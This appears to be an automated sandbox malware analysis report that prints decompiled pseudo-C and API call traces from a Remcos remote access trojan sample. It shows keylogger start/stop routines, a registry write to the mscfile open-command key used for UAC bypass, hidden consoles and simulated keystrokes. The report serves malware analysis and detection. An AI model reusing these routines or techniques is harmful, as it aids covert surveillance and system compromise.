                                  Similarity
                                  • API ID: File$AttributesCreate$Sleep$CloseDirectoryExistsHandlePathSize
                                  • String ID: dVA
                                  • API String ID: 3795512280-1571107130
                                  • Opcode ID: 338acc06453109cd0e6d1d3b9df89dcd6d5f75a7b173938059bb45aca4593fb9
                                  • Instruction ID: b8586eb6af0a19c3da14e8a9f5a77bb8bdb0eeac9fdc84eba283579dc6cba3d0
                                  • Opcode Fuzzy Hash: 338acc06453109cd0e6d1d3b9df89dcd6d5f75a7b173938059bb45aca4593fb9
                                  • Instruction Fuzzy Hash: 6A512D72A00909EBCB05ABE0EC5DADE7B78EF88355F008069F503D71A0EF749945CB98
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 10550944 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 120filesynchronizationCOMMON
                                  Download Yara Rule
                                  APIs
                                  • getenv.MSVCRT ref: 1055096B
                                  • ShellExecuteEx.SHELL32(0000003C), ref: 10550A20
                                  • WaitForSingleObject.KERNEL32(?,000000FF,00000070), ref: 10550A58
                                  • CloseHandle.KERNEL32(?), ref: 10550A61
                                  • DeleteFileA.KERNEL32(00000000), ref: 10550A71
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.534117821.0000000010540000.00000040.00000400.00020000.00000000.sdmp, Offset: 10540000, based on PE: true
                                  • Associated: 00000003.00000002.534181517.0000000010563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_10540000_logagent.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CloseDeleteExecuteFileHandleObjectShellSingleWaitgetenv
                                  • String ID: <$@
                                  • API String ID: 264928323-1426351568
                                  • Opcode ID: e1059c01280107604bb04a6877df16a1a878e402cadb1299a5217f872fcd5d73
                                  • Instruction ID: 68683fee51e434fc0409dd07b24f8c24cff4349a873a5f7d84f402939f04ac70
                                  • Opcode Fuzzy Hash: e1059c01280107604bb04a6877df16a1a878e402cadb1299a5217f872fcd5d73
                                  • Instruction Fuzzy Hash: 9841627190061DEBDB04EFE0DC8AEEE7B79EF84741F104026F512A6190EBB45A49CF94
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 105556CC Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 90memoryCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 63%
                                  			E105556CC(signed int __edx, intOrPtr _a4) {
				void _v1003;
				char _v1004;
				struct HWND__* _t13;
				signed int _t34;
				signed int _t36;
				unsigned int _t40;
				signed int _t41;
				signed int _t47;
				signed int _t50;
				signed int _t56;
				signed int _t59;
				signed int _t64;
				signed int _t65;
				void* _t91;
				void* _t92;
				void* _t93;

				_t64 = __edx;
				AllocConsole();
				_t13 =  *0x41c1f8();
				 *0x41c1fc = _t13;
				if(_a4 == 0) {
					ShowWindow(_t13, 0);
				}
				freopen(0x416e3c, 0x416e44,  *0x415398 + 0x20);
				_v1004 = 0;
				memset( &_v1003, 0, 0xf9 << 2);
				asm("stosw");
				asm("stosb");
				_t65 = _t64 | 0xffffffff;
				asm("repne scasb");
				_t40 =  !_t65;
				_t91 = 0x416e30 - _t40;
				_t41 = _t40 >> 2;
				memcpy(_t91 + _t41 + _t41, _t91, memcpy( &_v1004, _t91, _t41 << 2) & 0x00000003);
				asm("repne scasb");
				_t47 =  !_t65;
				_t92 = 0x4166c4 - _t47;
				_t34 = _t47;
				asm("repne scasb");
				_t50 = _t34 >> 2;
				memcpy( &_v1004 - 1, _t92, _t50 << 2);
				memcpy(_t92 + _t50 + _t50, _t92, _t34 & 0x00000003);
				asm("repne scasb");
				_t56 =  !_t65;
				_t93 = 0x416e14 - _t56;
				_t36 = _t56;
				asm("repne scasb");
				_t59 = _t36 >> 2;
				memcpy( &_v1004 - 1, _t93, _t59 << 2);
				memcpy(_t93 + _t59 + _t59, _t93, _t36 & 0x00000003);
				return printf( &_v1004);
			}



















                                  0x105556cc
                                  0x105556d8
                                  0x105556de
                                  0x105556e6
                                  0x105556ee
                                  0x105556f2
                                  0x105556f2
                                  0x1055570b
                                  0x1055571e
                                  0x10555724
                                  0x10555726
                                  0x10555728
                                  0x10555729
                                  0x10555735
                                  0x10555737
                                  0x10555743
                                  0x1055574d
                                  0x10555759
                                  0x10555762
                                  0x10555764
                                  0x10555768
                                  0x1055576c
                                  0x10555770
                                  0x10555775
                                  0x10555778
                                  0x10555785
                                  0x1055578e
                                  0x10555790
                                  0x10555794
                                  0x10555798
                                  0x1055579c
                                  0x105557a1
                                  0x105557a4
                                  0x105557b2
                                  0x105557c1

                                  APIs
                                  • AllocConsole.KERNEL32(004151CC,0041BCB0,00000000), ref: 105556D8
                                  • ShowWindow.USER32(00000000,00000000), ref: 105556F2
                                  • freopen.MSVCRT ref: 1055570B
                                  • printf.MSVCRT ref: 105557B4
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.534117821.0000000010540000.00000040.00000400.00020000.00000000.sdmp, Offset: 10540000, based on PE: true
                                  • Associated: 00000003.00000002.534181517.0000000010563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_10540000_logagent.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: AllocConsoleShowWindowfreopenprintf
                                  • String ID: * BreakingSecurity.Net$ * Remcos v$2.7.1 Pro
                                  • API String ID: 3419900118-867065911
                                  • Opcode ID: b1b5080caeedf021356004c91e5e7e7175471eb2af215126cee024e722724922
                                  • Instruction ID: 7a30c22b88a0c25bd1851bcafb30656a9677321df84462301581be4465969a35
                                  • Opcode Fuzzy Hash: b1b5080caeedf021356004c91e5e7e7175471eb2af215126cee024e722724922
                                  • Instruction Fuzzy Hash: F1212B36B406085BCB19DB7DDCE45EE7A97A7C4251B95827EF80BD73C0DEB08D488604
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 004031F8 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 64COMMON
                                  Download Yara Rule
                                  APIs
                                  • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(0041BA38,0041BCB0,00000000), ref: 00403224
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 0040322D
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(origmsc,00000000,000003E8,00000000), ref: 0040324D
                                    • Part of subcall function 0040B692: RegOpenKeyExA.KERNELBASE(80000001,0040936A,00000000,00020019,0040936A), ref: 0040B6AC
                                    • Part of subcall function 0040B692: RegQueryValueExA.KERNELBASE(0040936A,?,00000000,00000000,?,?,0041BCC0), ref: 0040B6C8
                                    • Part of subcall function 0040B692: RegCloseKey.KERNELBASE(0040936A), ref: 0040B6D3
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(?,?), ref: 00403278
                                    • Part of subcall function 0040B708: RegCreateKeyA.ADVAPI32(?,?,?), ref: 0040B715
                                    • Part of subcall function 0040B708: ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(0041BCB0,00000000,?,0040B948,?,?,?,?,?,?,00000000), ref: 0040B724
                                    • Part of subcall function 0040B708: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,0040B948,?,?,?,?,?,?,00000000), ref: 0040B72E
                                    • Part of subcall function 0040B708: RegSetValueExA.KERNELBASE(?,0040B948,00000000,?,00000000,?,0040B948,?,?,?,?,?,?,00000000), ref: 0040B741
                                    • Part of subcall function 0040B708: RegCloseKey.ADVAPI32(?,?,0040B948,?,?,?,?,?,?,00000000), ref: 0040B74C
                                    • Part of subcall function 0040B708: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,0040B948,?,?,?,?,?,?,00000000), ref: 0040B75B
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(origmsc), ref: 00403297
                                    • Part of subcall function 0040B95B: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(?,?,origmsc), ref: 0040B96C
                                    • Part of subcall function 0040B95B: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(004032A4,?), ref: 0040B97C
                                    • Part of subcall function 0040B95B: ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,004032A4,80000001), ref: 0040B993
                                    • Part of subcall function 0040B95B: ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,004032A4), ref: 0040B9AB
                                    • Part of subcall function 0040B95B: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040B9C2
                                    • Part of subcall function 0040B95B: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040B9CB
                                    • Part of subcall function 0040B95B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040B9D4
                                    • Part of subcall function 0040B95B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040B9DD
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.532672625.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000003.00000002.532934609.000000000041D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_400000_logagent.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$U?$char_traits@$D@2@@std@@D@std@@$?c_str@?$basic_string@$??1?$basic_string@$G@2@@std@@G@std@@$??0?$basic_string@D@1@@$CloseValue$?length@?$basic_string@?size@?$basic_string@CreateOpenQuery
                                  • String ID: Software\Classes\mscfile\shell\open\command$origmsc
                                  • API String ID: 1883807236-2313358711
                                  • Opcode ID: 6164d948096cc69d9a41c6752b69c33c22d8fca847b1021a8e2a0f545ec2985b
                                  • Instruction ID: 820ff65b2e21daf85941f98613c9b2fccc28e61cad3948ad9cf2f03c1057e28e
                                  • Opcode Fuzzy Hash: 6164d948096cc69d9a41c6752b69c33c22d8fca847b1021a8e2a0f545ec2985b
                                  • Instruction Fuzzy Hash: E1110A72A40554B7DB0267A9DC55BEF7B6DCB85300F0040B6F905A72C1DA780B0647EE
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0040AB30 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 58sleepCOMMON
                                  Download Yara Rule
                                  APIs
                                  • ??8std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z.MSVCP60(0041BA28,00415800,00000000,80000001,0041BA38), ref: 0040AB4C
                                  • ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60 ref: 0040AB78
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 0040AB81
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(exepath,00000000,00000410,00000000), ref: 0040AB9E
                                    • Part of subcall function 0040B692: RegOpenKeyExA.KERNELBASE(80000001,0040936A,00000000,00020019,0040936A), ref: 0040B6AC
                                    • Part of subcall function 0040B692: RegQueryValueExA.KERNELBASE(0040936A,?,00000000,00000000,?,?,0041BCC0), ref: 0040B6C8
                                    • Part of subcall function 0040B692: RegCloseKey.KERNELBASE(0040936A), ref: 0040B6D3
                                  • ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@PBG@Z.MSVCP60(?), ref: 0040ABC2
                                  • ??8std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z.MSVCP60(0041BA28,00415800), ref: 0040ABD2
                                  • Sleep.KERNEL32(00000BB8), ref: 0040ABF9
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60 ref: 0040AC0D
                                  • ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(00000003), ref: 0040AC32
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 0040AC3B
                                  • ?size@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIXZ.MSVCP60(00000000), ref: 0040AC44
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?), ref: 0040AC51
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(exepath,00000000), ref: 0040AC62
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.532672625.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000003.00000002.532934609.000000000041D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_400000_logagent.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: U?$char_traits@V?$allocator@$?c_str@?$basic_string@D@2@@std@@D@std@@G@std@@$G@2@@std@@$?size@?$basic_string@$??8std@@G@2@@0@V?$basic_string@$??4?$basic_string@CloseOpenQuerySleepV01@Value
                                  • String ID: .exe$WDH$exepath$open$temp_
                                  • API String ID: 3885969548-3088914985
                                  • Opcode ID: 167acccddfbce7862f75a81ffa886adb04af34d28bc9aa891ffc650833d03850
                                  • Instruction ID: 60cde0a6a469a490c1b109ae90cccba4ec5744e34f2951ce39ed213dd0605107
                                  • Opcode Fuzzy Hash: 167acccddfbce7862f75a81ffa886adb04af34d28bc9aa891ffc650833d03850
                                  • Instruction Fuzzy Hash: 2001D233740314A7DB0097949C59FEB7368DF84351F2040B7BA56A61D1DFB858D187AE
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00405CCA Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 53COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 19%
                                  			E00405CCA(struct HHOOK__** __ecx) {
				char _v5;
				char _v6;
				void* _t9;
				struct HHOOK__* _t16;
				struct HHOOK__** _t30;

				_push(__ecx);
				_t30 = __ecx;
				if( *((intOrPtr*)(__ecx + 0x3d)) == 0) {
					_t9 = 0;
				} else {
					__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z( &_v5);
					E00405DD3(__ecx);
					__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z();
					__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z();
					E0041203B("[INFO]",  &_v6, "Online Keylogger Stopped",  &_v5, "Online Keylogger Stopped");
					_t30[0xf] = 0;
					_t6 =  &(_t30[0xd]); // 0x0
					_t30[0xa] = 0;
					CloseHandle( *_t6);
					if(_t30[0xf] == 0) {
						_t16 =  *_t30;
						if(_t16 != 0) {
							UnhookWindowsHookEx(_t16);
							 *_t30 = 0;
						}
					}
					_t9 = 1;
				}
				return _t9;
			}








                                  0x00405ccd
                                  0x00405cd0
                                  0x00405cd8
                                  0x00405d49
                                  0x00405cda
                                  0x00405ce9
                                  0x00405cf1
                                  0x00405d00
                                  0x00405d14
                                  0x00405d1a
                                  0x00405d22
                                  0x00405d25
                                  0x00405d28
                                  0x00405d2b
                                  0x00405d34
                                  0x00405d36
                                  0x00405d3a
                                  0x00405d3d
                                  0x00405d43
                                  0x00405d43
                                  0x00405d3a
                                  0x00405d45
                                  0x00405d45
                                  0x00405d4f

                                  APIs
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(Online Keylogger Stopped,?,?,0040D1F8,0040D2A6,00000001), ref: 00405CE9
                                    • Part of subcall function 00405DD3: GetLocalTime.KERNEL32(?,761B43E0,Offline Keylogger Started,?,?,?,?,?,?,?,?,?,?,?,004051C6), ref: 00405DE1
                                    • Part of subcall function 00405DD3: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,[%04i/%02i/%02i %02i:%02i:%02i ,?,],?,?,?,?,?,?,?,?,?,?,?,004051C6), ref: 00405DF9
                                    • Part of subcall function 00405DD3: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,?,]), ref: 00405E06
                                    • Part of subcall function 00405DD3: ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,]), ref: 00405E12
                                    • Part of subcall function 00405DD3: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,]), ref: 00405E1B
                                    • Part of subcall function 00405DD3: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,]), ref: 00405E24
                                    • Part of subcall function 00405DD3: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,]), ref: 00405E2D
                                    • Part of subcall function 00405DD3: malloc.MSVCRT ref: 00405E37
                                    • Part of subcall function 00405DD3: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?,?,?,004051C6,?,?,?,?,]), ref: 00405E61
                                    • Part of subcall function 00405DD3: sprintf.MSVCRT ref: 00405E69
                                    • Part of subcall function 00405DD3: ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP60(00000000), ref: 00405E7C
                                    • Part of subcall function 00405DD3: ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP60(00000000), ref: 00405E8C
                                    • Part of subcall function 00405DD3: SetEvent.KERNEL32(00000000), ref: 00405E95
                                    • Part of subcall function 00405DD3: free.MSVCRT(00000000), ref: 00405E9C
                                    • Part of subcall function 00405DD3: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00405EA6
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(Online Keylogger Stopped,?), ref: 00405D00
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([INFO],?), ref: 00405D14
                                    • Part of subcall function 0041203B: GetLocalTime.KERNEL32(?), ref: 00412052
                                    • Part of subcall function 0041203B: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,%02i:%02i:%02i:%03i ,?,00416BFC,?,00415770,?,?,Q@,?), ref: 00412087
                                    • Part of subcall function 0041203B: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,Q@,?), ref: 00412094
                                    • Part of subcall function 0041203B: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,Q@,?), ref: 004120A1
                                    • Part of subcall function 0041203B: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,Q@,?), ref: 004120AE
                                    • Part of subcall function 0041203B: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,Q@,?), ref: 004120B8
                                    • Part of subcall function 0041203B: printf.MSVCRT ref: 004120BF
                                    • Part of subcall function 0041203B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120CB
                                    • Part of subcall function 0041203B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120D4
                                    • Part of subcall function 0041203B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120DD
                                    • Part of subcall function 0041203B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120E6
                                    • Part of subcall function 0041203B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120EF
                                    • Part of subcall function 0041203B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120F8
                                  • CloseHandle.KERNEL32(00000000), ref: 00405D2B
                                  • UnhookWindowsHookEx.USER32(00000000), ref: 00405D3D
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.532672625.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000003.00000002.532934609.000000000041D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_400000_logagent.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$D@std@@U?$char_traits@$D@2@@std@@$??1?$basic_string@$D@2@@0@Hstd@@V?$basic_string@$??0?$basic_string@D@1@@V01@V10@$?c_str@?$basic_string@LocalTimeV10@@Y?$basic_string@$??4?$basic_string@?length@?$basic_string@CloseEventHandleHookUnhookV01@@V10@0@Windowsfreemallocprintfsprintf
                                  • String ID: Online Keylogger Stopped$[INFO]
                                  • API String ID: 2254939683-2146459034
                                  • Opcode ID: 56c00de6d7886fd817b9d7ef9925f039a649f4dd6b432ad64e9b8e8786693fde
                                  • Instruction ID: 054b4bc7c437e62fba5109071e9382fc7819d51c50d88b2d3918446dea0eff9a
                                  • Opcode Fuzzy Hash: 56c00de6d7886fd817b9d7ef9925f039a649f4dd6b432ad64e9b8e8786693fde
                                  • Instruction Fuzzy Hash: 7701F575600A04AFD710BB69DC898FFBBACEE85240340497FE84293241D779AD458FA9
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00410440 Relevance: 12.1, APIs: 8, Instructions: 86keyboardCOMMON
                                  Download Yara Rule
                                  APIs
                                  • SendInput.USER32(00000001,0041021D,0000001C,?,?,00000000,0041021D), ref: 0041046B
                                  • SendInput.USER32(00000001,0041021D,0000001C,?,?,00000000,0041021D), ref: 00410483
                                  • SendInput.USER32(00000001,0041021D,0000001C,?,?,00000000,0041021D), ref: 0041049B
                                  • SendInput.USER32(00000001,0041021D,0000001C,?,?,00000000,0041021D), ref: 004104B0
                                  • SendInput.USER32(00000001,0041021D,0000001C,?,?,00000000,0041021D), ref: 004104C3
                                  • SendInput.USER32(00000001,0041021D,0000001C,?,?,00000000,0041021D), ref: 004104DA
                                  • SendInput.USER32(00000001,0041021D,0000001C,?,?,00000000,0041021D), ref: 004104F1
                                  • SendInput.USER32(00000001,0041021D,0000001C,?,?,00000000,0041021D), ref: 00410508
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.532672625.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000003.00000002.532934609.000000000041D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_400000_logagent.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: InputSend
                                  • String ID:
                                  • API String ID: 3431551938-0
                                  • Opcode ID: 64c49b0a3cb83d2657ffcb26cf9337e97bedcfabef8349bdbe6acd24d5a92541
                                  • Instruction ID: b328bb317d865897fc6c08efdded885432bfecfaa75727484ced0e6d4c13fc0d
                                  • Opcode Fuzzy Hash: 64c49b0a3cb83d2657ffcb26cf9337e97bedcfabef8349bdbe6acd24d5a92541
                                  • Instruction Fuzzy Hash: F03121B1D5124EA9EB11EF949981FFFBFBCAF18301F504026E640B6142D3B446859BE6
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00401A5E Relevance: 12.1, APIs: 8, Instructions: 62COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 28%
                                  			E00401A5E(intOrPtr* __eax, void* __eflags, void* _a8) {
				char _v20;
				char _v36;
				void* _t18;
				void* _t20;
				intOrPtr _t39;

				__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
				_t39 =  *__eax;
				__imp__?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z();
				__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z();
				__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z();
				E004129EB(__eflags,  &_v20,  &_v36, 0x41b310,  &_v36, 4,  *__imp__?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB);
				_t18 = _t39 - 0x9b;
				if(_t18 == 0) {
					__imp__??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z(E0040180C( &_v20, __eflags, 1));
					 *0x41b288 = 1;
					_t20 = E0040180C( &_v20, __eflags, 0);
					__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z();
					E004020C2(0x41b240, 0x9c, _t20);
				} else {
					if(_t18 == 0) {
						E00401B26();
					}
				}
				E004017DD( &_v20);
				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
				return 0;
			}








                                  0x00401a68
                                  0x00401a6e
                                  0x00401a80
                                  0x00401a90
                                  0x00401a9f
                                  0x00401aa9
                                  0x00401ab3
                                  0x00401ab8
                                  0x00401ad5
                                  0x00401ae0
                                  0x00401ae7
                                  0x00401af2
                                  0x00401b02
                                  0x00401aba
                                  0x00401abc
                                  0x00401abe
                                  0x00401abe
                                  0x00401abc
                                  0x00401b0a
                                  0x00401b12
                                  0x00401b1b
                                  0x00401b25

                                  APIs
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 00401A68
                                  • ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000004,6DF55DF0), ref: 00401A80
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(0041B310), ref: 00401A90
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 00401A9F
                                    • Part of subcall function 004129EB: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 004129FA
                                    • Part of subcall function 004129EB: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A11
                                    • Part of subcall function 004129EB: ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIABV12@I@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5), ref: 00412A27
                                    • Part of subcall function 004129EB: ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000000,00000000), ref: 00412A45
